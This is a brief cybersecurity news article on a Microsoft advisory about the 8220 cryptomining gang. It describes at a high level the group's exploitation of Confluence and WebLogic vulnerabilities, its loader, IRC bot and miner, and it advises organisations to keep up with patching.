The Microsoft company has released a threat advisory regarding a mining gang called 8220 that targets the Linux operating system. Moreover, this newly discovered threat group has been seen installing crypto-mining malware.
According to the researchers, the adversary was spotted with an updated malware campaign that included a new strain of IRC bot and a cryptominer.
Microsoft has revealed the latest threat campaigns of the 8220 gang, in which they were discovered abusing a critical vulnerability that affects the Atlassian Confluence Server and Data Centre.
The cybersecurity researchers stated that the new cybersecurity campaign targets the x86_64 and i686 Linux systems. In addition, the threat operators adopt RCE exploits for CVE-2022-26134 (Atlassian Confluence Server and Data Center) and CVE-2019-2725 (Oracle WebLogic) for initial access.
The 8220 mining group has been updating its strategies and payloads for quite some time.
Based on reports, the threat actors operating the 8220 group have been actively updating their tricks, techniques, procedures, and payloads for a long period. One of the notable updates to its used malware includes launching a new cryptocurrency miner version and an IRC bot.
The threat group was also spotted targeting the Windows systems through the Atlassian vulnerability to inject a script into a PowerShell memory process. After the first access, the backdoor downloads and installs a loader to the system that alters its configuration.
Furthermore, the malicious loader deactivates the security services of the infected device. Subsequently, the loader will download a cryptominer, enable a network’s persistence, and review the ports to locate other servers.
A separate researcher has also seen targeting the Docker image and the Apache Struts2 image critical flaw to infect the enterprise servers. As of now, researchers are trying to figure out the ins and outs of this threat group since it has new features and capabilities, which further complicates its operations.
Malicious threat actors are known for abusing numerous security vulnerabilities for their profit and further attacks. Cybersecurity experts suggest that organisations follow a proper patch management program to remain updated and mitigate potential attacks.